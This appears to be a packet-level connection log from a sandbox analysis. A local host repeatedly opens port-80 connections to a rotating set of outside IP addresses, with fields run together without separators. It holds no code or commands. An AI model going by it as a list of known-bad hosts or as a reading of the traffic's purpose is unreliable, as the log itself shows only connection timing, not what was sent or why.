                                                                  Nov 18, 2024 13:13:27.757010937 CET8053155176.117.73.104192.168.2.7
                                                                  Nov 18, 2024 13:13:27.757116079 CET5315580192.168.2.7176.117.73.104
                                                                  Nov 18, 2024 13:13:27.777478933 CET5315580192.168.2.7176.117.73.104
                                                                  Nov 18, 2024 13:13:27.782413960 CET8053155176.117.73.104192.168.2.7
                                                                  Nov 18, 2024 13:13:27.782497883 CET8053155176.117.73.104192.168.2.7
                                                                  Nov 18, 2024 13:13:28.587275982 CET8053155176.117.73.104192.168.2.7
                                                                  Nov 18, 2024 13:13:28.640924931 CET5315580192.168.2.7176.117.73.104
                                                                  Nov 18, 2024 13:13:28.705878973 CET8053155176.117.73.104192.168.2.7
                                                                  Nov 18, 2024 13:13:28.706058025 CET5315580192.168.2.7176.117.73.104
                                                                  Nov 18, 2024 13:13:29.281758070 CET5315580192.168.2.7176.117.73.104
                                                                  Nov 18, 2024 13:13:30.303400040 CET5315680192.168.2.7176.117.73.104
                                                                  Nov 18, 2024 13:13:30.308568001 CET8053156176.117.73.104192.168.2.7
                                                                  Nov 18, 2024 13:13:30.308700085 CET5315680192.168.2.7176.117.73.104
                                                                  Nov 18, 2024 13:13:30.390229940 CET5315680192.168.2.7176.117.73.104
                                                                  Nov 18, 2024 13:13:30.395235062 CET8053156176.117.73.104192.168.2.7
                                                                  Nov 18, 2024 13:13:31.532265902 CET8053156176.117.73.104192.168.2.7
                                                                  Nov 18, 2024 13:13:31.532334089 CET8053156176.117.73.104192.168.2.7
                                                                  Nov 18, 2024 13:13:31.532392979 CET8053156176.117.73.104192.168.2.7
                                                                  Nov 18, 2024 13:13:31.532521009 CET8053156176.117.73.104192.168.2.7
                                                                  Nov 18, 2024 13:13:31.532537937 CET5315680192.168.2.7176.117.73.104
                                                                  Nov 18, 2024 13:13:31.532572985 CET8053156176.117.73.104192.168.2.7
                                                                  Nov 18, 2024 13:13:31.532594919 CET5315680192.168.2.7176.117.73.104
                                                                  Nov 18, 2024 13:13:31.532624006 CET8053156176.117.73.104192.168.2.7
                                                                  Nov 18, 2024 13:13:31.532674074 CET8053156176.117.73.104192.168.2.7
                                                                  Nov 18, 2024 13:13:31.532705069 CET5315680192.168.2.7176.117.73.104
                                                                  Nov 18, 2024 13:13:31.533117056 CET8053156176.117.73.104192.168.2.7
                                                                  Nov 18, 2024 13:13:31.533165932 CET8053156176.117.73.104192.168.2.7
                                                                  Nov 18, 2024 13:13:31.533174992 CET5315680192.168.2.7176.117.73.104
                                                                  Nov 18, 2024 13:13:31.533220053 CET8053156176.117.73.104192.168.2.7
                                                                  Nov 18, 2024 13:13:31.533284903 CET5315680192.168.2.7176.117.73.104
                                                                  Nov 18, 2024 13:13:31.647066116 CET8053156176.117.73.104192.168.2.7
                                                                  Nov 18, 2024 13:13:31.647269964 CET5315680192.168.2.7176.117.73.104
                                                                  Nov 18, 2024 13:13:31.648814917 CET5315680192.168.2.7176.117.73.104
                                                                  Nov 18, 2024 13:13:31.653712034 CET8053156176.117.73.104192.168.2.7
                                                                  Nov 18, 2024 13:13:36.705244064 CET5315780192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:36.710299015 CET805315713.248.169.48192.168.2.7
                                                                  Nov 18, 2024 13:13:36.710369110 CET5315780192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:36.728044033 CET5315780192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:36.732898951 CET805315713.248.169.48192.168.2.7
                                                                  Nov 18, 2024 13:13:37.411020994 CET805315713.248.169.48192.168.2.7
                                                                  Nov 18, 2024 13:13:37.411117077 CET5315780192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:38.238135099 CET5315780192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:38.243158102 CET805315713.248.169.48192.168.2.7
                                                                  Nov 18, 2024 13:13:39.253700018 CET5315880192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:39.258795977 CET805315813.248.169.48192.168.2.7
                                                                  Nov 18, 2024 13:13:39.258917093 CET5315880192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:39.274394989 CET5315880192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:39.279287100 CET805315813.248.169.48192.168.2.7
                                                                  Nov 18, 2024 13:13:39.959908962 CET805315813.248.169.48192.168.2.7
                                                                  Nov 18, 2024 13:13:39.960092068 CET5315880192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:40.781712055 CET5315880192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:40.786678076 CET805315813.248.169.48192.168.2.7
                                                                  Nov 18, 2024 13:13:41.800550938 CET5315980192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:41.805701017 CET805315913.248.169.48192.168.2.7
                                                                  Nov 18, 2024 13:13:41.805794001 CET5315980192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:41.823069096 CET5315980192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:41.828084946 CET805315913.248.169.48192.168.2.7
                                                                  Nov 18, 2024 13:13:41.828171968 CET805315913.248.169.48192.168.2.7
                                                                  Nov 18, 2024 13:13:42.463135004 CET805315913.248.169.48192.168.2.7
                                                                  Nov 18, 2024 13:13:42.463268995 CET5315980192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:43.336425066 CET5315980192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:43.341445923 CET805315913.248.169.48192.168.2.7
                                                                  Nov 18, 2024 13:13:44.347446918 CET5316080192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:44.352677107 CET805316013.248.169.48192.168.2.7
                                                                  Nov 18, 2024 13:13:44.352781057 CET5316080192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:44.361424923 CET5316080192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:44.366539955 CET805316013.248.169.48192.168.2.7
                                                                  Nov 18, 2024 13:13:45.021100998 CET805316013.248.169.48192.168.2.7
                                                                  Nov 18, 2024 13:13:45.053297043 CET805316013.248.169.48192.168.2.7
                                                                  Nov 18, 2024 13:13:45.053482056 CET5316080192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:45.054344893 CET5316080192.168.2.713.248.169.48
                                                                  Nov 18, 2024 13:13:45.059159040 CET805316013.248.169.48192.168.2.7
                                                                  Nov 18, 2024 13:13:50.552486897 CET5316180192.168.2.7107.167.84.42
                                                                  Nov 18, 2024 13:13:50.557481050 CET8053161107.167.84.42192.168.2.7
                                                                  Nov 18, 2024 13:13:50.557565928 CET5316180192.168.2.7107.167.84.42
                                                                  Nov 18, 2024 13:13:50.572206020 CET5316180192.168.2.7107.167.84.42
                                                                  Nov 18, 2024 13:13:50.577276945 CET8053161107.167.84.42192.168.2.7
                                                                  Nov 18, 2024 13:13:51.201149940 CET8053161107.167.84.42192.168.2.7
                                                                  Nov 18, 2024 13:13:51.201195002 CET8053161107.167.84.42192.168.2.7
                                                                  Nov 18, 2024 13:13:51.201404095 CET5316180192.168.2.7107.167.84.42
                                                                  Nov 18, 2024 13:13:51.222337961 CET8053161107.167.84.42192.168.2.7
                                                                  Nov 18, 2024 13:13:51.222592115 CET5316180192.168.2.7107.167.84.42
                                                                  Nov 18, 2024 13:13:52.103833914 CET5316180192.168.2.7107.167.84.42
                                                                  Nov 18, 2024 13:13:53.113701105 CET5316280192.168.2.7107.167.84.42
                                                                  Nov 18, 2024 13:13:53.119198084 CET8053162107.167.84.42192.168.2.7
                                                                  Nov 18, 2024 13:13:53.119285107 CET5316280192.168.2.7107.167.84.42
                                                                  Nov 18, 2024 13:13:53.134028912 CET5316280192.168.2.7107.167.84.42
                                                                  Nov 18, 2024 13:13:53.139307976 CET8053162107.167.84.42192.168.2.7
                                                                  Nov 18, 2024 13:13:53.754245996 CET8053162107.167.84.42192.168.2.7
                                                                  Nov 18, 2024 13:13:53.754277945 CET8053162107.167.84.42192.168.2.7
                                                                  Nov 18, 2024 13:13:53.754465103 CET5316280192.168.2.7107.167.84.42
                                                                  Nov 18, 2024 13:13:53.776603937 CET8053162107.167.84.42192.168.2.7
                                                                  Nov 18, 2024 13:13:53.776846886 CET5316280192.168.2.7107.167.84.42
                                                                  Nov 18, 2024 13:13:54.641109943 CET5316280192.168.2.7107.167.84.42
                                                                  Nov 18, 2024 13:13:55.781397104 CET5316380192.168.2.7107.167.84.42
                                                                  Nov 18, 2024 13:13:55.786628962 CET8053163107.167.84.42192.168.2.7
                                                                  Nov 18, 2024 13:13:55.789597034 CET5316380192.168.2.7107.167.84.42
                                                                  Nov 18, 2024 13:13:55.919303894 CET5316380192.168.2.7107.167.84.42
                                                                  Nov 18, 2024 13:13:55.924243927 CET8053163107.167.84.42192.168.2.7
                                                                  Nov 18, 2024 13:13:55.924261093 CET8053163107.167.84.42192.168.2.7
                                                                  Nov 18, 2024 13:13:56.424360991 CET8053163107.167.84.42192.168.2.7
                                                                  Nov 18, 2024 13:13:56.424381971 CET8053163107.167.84.42192.168.2.7
                                                                  Nov 18, 2024 13:13:56.424551964 CET5316380192.168.2.7107.167.84.42
                                                                  Nov 18, 2024 13:13:56.445944071 CET8053163107.167.84.42192.168.2.7
                                                                  Nov 18, 2024 13:13:56.446098089 CET5316380192.168.2.7107.167.84.42
                                                                  Nov 18, 2024 13:13:57.422477961 CET5316380192.168.2.7107.167.84.42
                                                                  Nov 18, 2024 13:13:58.441061020 CET5316480192.168.2.7107.167.84.42
                                                                  Nov 18, 2024 13:13:58.446096897 CET8053164107.167.84.42192.168.2.7
                                                                  Nov 18, 2024 13:13:58.446207047 CET5316480192.168.2.7107.167.84.42
                                                                  Nov 18, 2024 13:13:58.455259085 CET5316480192.168.2.7107.167.84.42
                                                                  Nov 18, 2024 13:13:58.460313082 CET8053164107.167.84.42192.168.2.7
                                                                  Nov 18, 2024 13:13:59.085617065 CET8053164107.167.84.42192.168.2.7
                                                                  Nov 18, 2024 13:13:59.085654020 CET8053164107.167.84.42192.168.2.7
                                                                  Nov 18, 2024 13:13:59.085864067 CET5316480192.168.2.7107.167.84.42
                                                                  Nov 18, 2024 13:13:59.107266903 CET8053164107.167.84.42192.168.2.7
                                                                  Nov 18, 2024 13:13:59.107501030 CET5316480192.168.2.7107.167.84.42
                                                                  Nov 18, 2024 13:13:59.109364986 CET5316480192.168.2.7107.167.84.42
                                                                  Nov 18, 2024 13:13:59.114346981 CET8053164107.167.84.42192.168.2.7
                                                                  Nov 18, 2024 13:14:04.157341957 CET5316580192.168.2.7176.32.38.130
                                                                  Nov 18, 2024 13:14:04.162425041 CET8053165176.32.38.130192.168.2.7
                                                                  Nov 18, 2024 13:14:04.162616968 CET5316580192.168.2.7176.32.38.130
                                                                  Nov 18, 2024 13:14:04.178936005 CET5316580192.168.2.7176.32.38.130
                                                                  Nov 18, 2024 13:14:04.183760881 CET8053165176.32.38.130192.168.2.7
                                                                  Nov 18, 2024 13:14:05.087698936 CET8053165176.32.38.130192.168.2.7
                                                                  Nov 18, 2024 13:14:05.141057968 CET5316580192.168.2.7176.32.38.130
                                                                  Nov 18, 2024 13:14:05.245594978 CET8053165176.32.38.130192.168.2.7
                                                                  Nov 18, 2024 13:14:05.245748997 CET5316580192.168.2.7176.32.38.130
                                                                  Nov 18, 2024 13:14:05.688076019 CET5316580192.168.2.7176.32.38.130
                                                                  Nov 18, 2024 13:14:06.809012890 CET5316680192.168.2.7176.32.38.130
                                                                  Nov 18, 2024 13:14:06.814336061 CET8053166176.32.38.130192.168.2.7
                                                                  Nov 18, 2024 13:14:06.814491987 CET5316680192.168.2.7176.32.38.130
                                                                  Nov 18, 2024 13:14:07.044697046 CET5316680192.168.2.7176.32.38.130
                                                                  Nov 18, 2024 13:14:07.049623013 CET8053166176.32.38.130192.168.2.7
                                                                  Nov 18, 2024 13:14:07.736435890 CET8053166176.32.38.130192.168.2.7
                                                                  Nov 18, 2024 13:14:07.781687021 CET5316680192.168.2.7176.32.38.130
                                                                  Nov 18, 2024 13:14:07.898957014 CET8053166176.32.38.130192.168.2.7
                                                                  Nov 18, 2024 13:14:07.899060965 CET5316680192.168.2.7176.32.38.130
                                                                  Nov 18, 2024 13:14:08.547527075 CET5316680192.168.2.7176.32.38.130
                                                                  Nov 18, 2024 13:14:09.566185951 CET5316780192.168.2.7176.32.38.130
                                                                  Nov 18, 2024 13:14:09.571186066 CET8053167176.32.38.130192.168.2.7
                                                                  Nov 18, 2024 13:14:09.571278095 CET5316780192.168.2.7176.32.38.130
                                                                  Nov 18, 2024 13:14:09.585781097 CET5316780192.168.2.7176.32.38.130
                                                                  Nov 18, 2024 13:14:09.590665102 CET8053167176.32.38.130192.168.2.7
                                                                  Nov 18, 2024 13:14:09.590912104 CET8053167176.32.38.130192.168.2.7
                                                                  Nov 18, 2024 13:14:10.474663019 CET8053167176.32.38.130192.168.2.7
                                                                  Nov 18, 2024 13:14:10.517190933 CET5316780192.168.2.7176.32.38.130
                                                                  Nov 18, 2024 13:14:10.629995108 CET8053167176.32.38.130192.168.2.7
                                                                  Nov 18, 2024 13:14:10.630070925 CET5316780192.168.2.7176.32.38.130
                                                                  Nov 18, 2024 13:14:11.094286919 CET5316780192.168.2.7176.32.38.130
                                                                  Nov 18, 2024 13:14:12.113079071 CET5316880192.168.2.7176.32.38.130
                                                                  Nov 18, 2024 13:14:12.118053913 CET8053168176.32.38.130192.168.2.7
                                                                  Nov 18, 2024 13:14:12.118158102 CET5316880192.168.2.7176.32.38.130
                                                                  Nov 18, 2024 13:14:12.127274990 CET5316880192.168.2.7176.32.38.130
                                                                  Nov 18, 2024 13:14:12.132276058 CET8053168176.32.38.130192.168.2.7
                                                                  Nov 18, 2024 13:14:13.032849073 CET8053168176.32.38.130192.168.2.7
                                                                  Nov 18, 2024 13:14:13.078566074 CET5316880192.168.2.7176.32.38.130
                                                                  Nov 18, 2024 13:14:13.193427086 CET8053168176.32.38.130192.168.2.7
                                                                  Nov 18, 2024 13:14:13.193708897 CET5316880192.168.2.7176.32.38.130
                                                                  Nov 18, 2024 13:14:13.195502043 CET5316880192.168.2.7176.32.38.130
                                                                  Nov 18, 2024 13:14:13.200359106 CET8053168176.32.38.130192.168.2.7
                                                                  Nov 18, 2024 13:14:18.276961088 CET5316980192.168.2.7161.97.142.144
                                                                  Nov 18, 2024 13:14:18.281991005 CET8053169161.97.142.144192.168.2.7
                                                                  Nov 18, 2024 13:14:18.282078028 CET5316980192.168.2.7161.97.142.144
                                                                  Nov 18, 2024 13:14:18.296999931 CET5316980192.168.2.7161.97.142.144
                                                                  Nov 18, 2024 13:14:18.302088976 CET8053169161.97.142.144192.168.2.7
                                                                  Nov 18, 2024 13:14:19.154207945 CET8053169161.97.142.144192.168.2.7
                                                                  Nov 18, 2024 13:14:19.154241085 CET8053169161.97.142.144192.168.2.7
                                                                  Nov 18, 2024 13:14:19.154386044 CET5316980192.168.2.7161.97.142.144
                                                                  Nov 18, 2024 13:14:19.281522989 CET8053169161.97.142.144192.168.2.7
                                                                  Nov 18, 2024 13:14:19.281644106 CET5316980192.168.2.7161.97.142.144
                                                                  Nov 18, 2024 13:14:19.814907074 CET5316980192.168.2.7161.97.142.144
                                                                  Nov 18, 2024 13:14:20.839162111 CET5317080192.168.2.7161.97.142.144
                                                                  Nov 18, 2024 13:14:20.844266891 CET8053170161.97.142.144192.168.2.7
                                                                  Nov 18, 2024 13:14:20.844474077 CET5317080192.168.2.7161.97.142.144
                                                                  Nov 18, 2024 13:14:20.863195896 CET5317080192.168.2.7161.97.142.144
                                                                  Nov 18, 2024 13:14:20.868278027 CET8053170161.97.142.144192.168.2.7
                                                                  Nov 18, 2024 13:14:21.698690891 CET8053170161.97.142.144192.168.2.7
                                                                  Nov 18, 2024 13:14:21.698707104 CET8053170161.97.142.144192.168.2.7
                                                                  Nov 18, 2024 13:14:21.698796034 CET5317080192.168.2.7161.97.142.144
                                                                  Nov 18, 2024 13:14:21.825431108 CET8053170161.97.142.144192.168.2.7
                                                                  Nov 18, 2024 13:14:21.825567007 CET5317080192.168.2.7161.97.142.144
                                                                  Nov 18, 2024 13:14:22.375552893 CET5317080192.168.2.7161.97.142.144
                                                                  Nov 18, 2024 13:14:23.499183893 CET5317180192.168.2.7161.97.142.144
                                                                  Nov 18, 2024 13:14:23.504190922 CET8053171161.97.142.144192.168.2.7
                                                                  Nov 18, 2024 13:14:23.504338980 CET5317180192.168.2.7161.97.142.144
                                                                  Nov 18, 2024 13:14:23.595905066 CET5317180192.168.2.7161.97.142.144
                                                                  Nov 18, 2024 13:14:23.600886106 CET8053171161.97.142.144192.168.2.7
                                                                  Nov 18, 2024 13:14:23.600900888 CET8053171161.97.142.144192.168.2.7
                                                                  Nov 18, 2024 13:14:24.360114098 CET8053171161.97.142.144192.168.2.7
                                                                  Nov 18, 2024 13:14:24.360138893 CET8053171161.97.142.144192.168.2.7
                                                                  Nov 18, 2024 13:14:24.360270023 CET5317180192.168.2.7161.97.142.144
                                                                  Nov 18, 2024 13:14:24.487016916 CET8053171161.97.142.144192.168.2.7
                                                                  Nov 18, 2024 13:14:24.487075090 CET5317180192.168.2.7161.97.142.144
                                                                  Nov 18, 2024 13:14:25.141534090 CET5317180192.168.2.7161.97.142.144
                                                                  Nov 18, 2024 13:14:26.159890890 CET5317280192.168.2.7161.97.142.144
                                                                  Nov 18, 2024 13:14:26.164864063 CET8053172161.97.142.144192.168.2.7
                                                                  Nov 18, 2024 13:14:26.164983034 CET5317280192.168.2.7161.97.142.144
                                                                  Nov 18, 2024 13:14:26.173993111 CET5317280192.168.2.7161.97.142.144
                                                                  Nov 18, 2024 13:14:26.178828001 CET8053172161.97.142.144192.168.2.7
                                                                  Nov 18, 2024 13:14:27.024132967 CET8053172161.97.142.144192.168.2.7
                                                                  Nov 18, 2024 13:14:27.024188042 CET8053172161.97.142.144192.168.2.7
                                                                  Nov 18, 2024 13:14:27.024202108 CET8053172161.97.142.144192.168.2.7
                                                                  Nov 18, 2024 13:14:27.024295092 CET5317280192.168.2.7161.97.142.144
                                                                  Nov 18, 2024 13:14:27.028852940 CET8053172161.97.142.144192.168.2.7
                                                                  Nov 18, 2024 13:14:27.028924942 CET5317280192.168.2.7161.97.142.144
                                                                  Nov 18, 2024 13:14:27.151259899 CET8053172161.97.142.144192.168.2.7
                                                                  Nov 18, 2024 13:14:27.151459932 CET5317280192.168.2.7161.97.142.144
                                                                  Nov 18, 2024 13:14:27.162761927 CET5317280192.168.2.7161.97.142.144
                                                                  Nov 18, 2024 13:14:27.167831898 CET8053172161.97.142.144192.168.2.7
                                                                  Nov 18, 2024 13:14:32.917845964 CET5317380192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:32.922977924 CET8053173203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:32.923063993 CET5317380192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:32.937556982 CET5317380192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:32.942584991 CET8053173203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:33.633407116 CET8053173203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:33.633471966 CET8053173203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:33.633524895 CET8053173203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:33.633606911 CET5317380192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:33.633620024 CET8053173203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:33.633661985 CET8053173203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:33.633729935 CET5317380192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:33.633774042 CET8053173203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:33.633810043 CET8053173203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:33.633856058 CET5317380192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:33.633913994 CET8053173203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:33.633948088 CET8053173203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:33.633977890 CET5317380192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:33.633981943 CET8053173203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:33.634044886 CET5317380192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:33.638559103 CET8053173203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:33.638622046 CET8053173203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:33.638675928 CET8053173203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:33.638712883 CET8053173203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:33.638725996 CET5317380192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:33.638794899 CET5317380192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:33.750575066 CET8053173203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:33.750627995 CET8053173203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:33.750670910 CET5317380192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:33.750686884 CET8053173203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:33.750730038 CET5317380192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:34.453802109 CET5317380192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:35.473624945 CET5317480192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:35.478662014 CET8053174203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:35.478749990 CET5317480192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:35.493324995 CET5317480192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:35.498300076 CET8053174203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:36.188283920 CET8053174203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:36.188317060 CET8053174203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:36.188334942 CET8053174203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:36.188422918 CET8053174203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:36.188441992 CET5317480192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:36.188481092 CET5317480192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:36.188502073 CET8053174203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:36.188515902 CET8053174203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:36.188532114 CET8053174203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:36.188548088 CET8053174203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:36.188554049 CET5317480192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:36.188601017 CET5317480192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:36.188635111 CET8053174203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:36.188648939 CET8053174203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:36.188723087 CET5317480192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:36.193459034 CET8053174203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:36.193545103 CET8053174203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:36.193563938 CET8053174203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:36.193614960 CET5317480192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:36.193639994 CET8053174203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:36.193701982 CET5317480192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:36.193773031 CET8053174203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:36.235073090 CET5317480192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:36.306143999 CET8053174203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:36.306169987 CET8053174203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:36.306191921 CET8053174203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:36.306263924 CET5317480192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:36.306319952 CET5317480192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:37.000734091 CET5317480192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:38.044984102 CET5317580192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:38.050030947 CET8053175203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:38.050139904 CET5317580192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:38.064846992 CET5317580192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:38.069931030 CET8053175203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:38.069946051 CET8053175203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:38.756336927 CET8053175203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:38.756401062 CET8053175203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:38.756418943 CET8053175203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:38.756437063 CET8053175203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:38.756479025 CET5317580192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:38.756479025 CET5317580192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:38.756499052 CET8053175203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:38.756515026 CET8053175203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:38.756531954 CET8053175203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:38.756551027 CET8053175203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:38.756570101 CET5317580192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:38.756597996 CET5317580192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:38.756772041 CET8053175203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:38.756789923 CET8053175203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:38.756831884 CET5317580192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:38.761657953 CET8053175203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:38.761682034 CET8053175203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:38.761701107 CET8053175203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:38.761742115 CET5317580192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:38.761754990 CET8053175203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:38.761831045 CET5317580192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:38.873296976 CET8053175203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:38.873349905 CET8053175203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:38.873394012 CET8053175203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:38.873466015 CET5317580192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:39.578811884 CET5317580192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:40.597158909 CET5317680192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:40.602107048 CET8053176203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:40.602225065 CET5317680192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:40.610688925 CET5317680192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:40.615540028 CET8053176203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:41.324331045 CET8053176203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:41.324358940 CET8053176203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:41.324373960 CET8053176203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:41.324492931 CET5317680192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:41.324507952 CET8053176203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:41.324538946 CET8053176203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:41.324553013 CET8053176203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:41.324565887 CET8053176203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:41.324614048 CET5317680192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:41.324793100 CET8053176203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:41.324806929 CET8053176203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:41.324815035 CET5317680192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:41.324820995 CET8053176203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:41.324841976 CET5317680192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:41.324867964 CET5317680192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:41.329731941 CET8053176203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:41.329997063 CET8053176203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:41.330009937 CET8053176203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:41.330054045 CET5317680192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:41.375638008 CET5317680192.168.2.7203.161.46.205
                                                                  Nov 18, 2024 13:14:41.442893028 CET8053176203.161.46.205192.168.2.7
                                                                  Nov 18, 2024 13:14:41.443298101 CET8053176203.161.46.205192.168.2.7
